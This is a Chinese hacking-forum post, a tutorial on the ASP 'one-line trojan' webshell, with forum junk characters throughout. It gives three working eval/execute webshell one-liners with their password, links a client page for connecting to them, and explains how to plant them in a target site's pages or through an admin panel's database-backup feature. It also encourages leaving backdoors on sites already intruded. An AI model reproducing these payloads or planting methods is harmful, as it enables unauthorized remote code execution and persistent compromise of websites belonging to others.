- 帖子
- 131
- 积分
- 1083
- 威望
- 358
- 金钱
- 2450
- 在线时间
- 414 小时
|
一句话木马的使用
2 i8 p% M/ E8 l) I( c0 |1 G9 h6 U+ ?% {# Q
by:柔肠寸断 790653916 www.3ast.com.cn 不免费收点徒弟~~~
& \9 s" s4 Y& {& @4 M6 b
# a) ~5 W& M! \1 _' l0 y
`! l9 {9 w& {* G, C8 t1、咱们先弄懂怎么使用的。
0 s% c/ d f; U' ?+ P+ q8 r, k! l3 f0 w- E
分为客户端和服务端
- j$ k: b S9 s3 h7 q" e& {2 r; ^. t
. o4 I* u, N( ?( {& c0 G' _
客户端是连接上去的程序,也可以是网页
+ `+ J& }9 E: H; g( N* f$ t1 ~# o6 z4 u; c7 u- t
http://www.3ast.com.cn/tool/yijuhua.html: X& ]- `4 U( r7 v# r
4 x o" r4 k) t* f8 g. x
服务端就是一段代码,代码里有对应的“密码”
/ p. M( i" m+ d1 p9 l+ ?8 x! g
6 [$ ~' R0 }$ O5 y" Z提供三个服务端: / j( F: q) ~5 n* L
1. <%eval request("cnnsc")%> 5 O+ @, i( m( a, [
2. <%execute request("cnnsc")%> {* n; n. K- n
3. <%execute(request("cnnsc"))%> , G( W1 a+ _' D( X, U- P
9 B9 m. o, n* I* r
cnnsc--密码' Z8 ]3 W* w' x0 u
" O) C6 Q/ P! ~我们只要把这个代码插入到对方网站的网页中就可以了; j' o8 T8 ^% o( K
^$ r( {7 N( {9 n" N1 b p0 @我演示下,用已经有的一个webshell添加一个asp文件,加上 <%eval request("cnnsc")%> 9 |4 Q0 K$ s8 M8 q( o$ z
- Q* b9 ?9 h# B- F1 V
换一个页面,添加过了。访问的时候一切正常,看链接
- c8 }# d! p) Y+ `
% J- ^0 {9 j3 m! u1 L上传之后' M) g6 x8 _1 I9 K
$ G: W3 r! E H) {: ~' |) U
链接上去了
+ Q# b0 M! h* Q5 n3 r; W# }2 UOK.这个就是链接的主要过程
3 T) }2 F) _: e) G4 k0 b
/ @' J7 \* M( f6 d( U7 J
0 N) b' N& U3 h3 H( o! Y3 j3 l
) p: Q+ i; p8 I. c0 O; I) k1 {) t4 Z; x+ Z+ @) E6 k
2、然后懂得哪里会用上、怎么用$ ^) M& C$ k+ A* Y
" O1 U" K- w1 }' \! f& \(1)有的时候我们进入了XXX的后台,后台有备份数据库,那么我们就可以在系统中插入这个一句话代码,任意地方,比如皮肤名称啊,文章标题啊,只要是会被写进数据库的就可以了,然后备份数据库成一个asp文件(也有php的一句话),然后链接就可以拿下来了
* Y4 V% D7 Q2 k h% H
+ e) w9 s! K7 u! p) ]( @(2)可以给自己入侵的网站留下后门。。。。" R; E$ P& m: g9 d) `" {' {# L
) m6 A/ Q; l/ W* `7 d& y3 Z0 B(3)我再想想。。。哎,想不出,还是要自己多多实践。。。。
& |( s1 \' A1 F' n8 x. @5 Q3 M7 s7 k0 G+ v- F
好了,教程到此结束,不懂的可以再来问我。。。790653916 |
附件: 您需要登录才可以下载或查看附件。没有帐号?注册
-
1
评分人数
-
|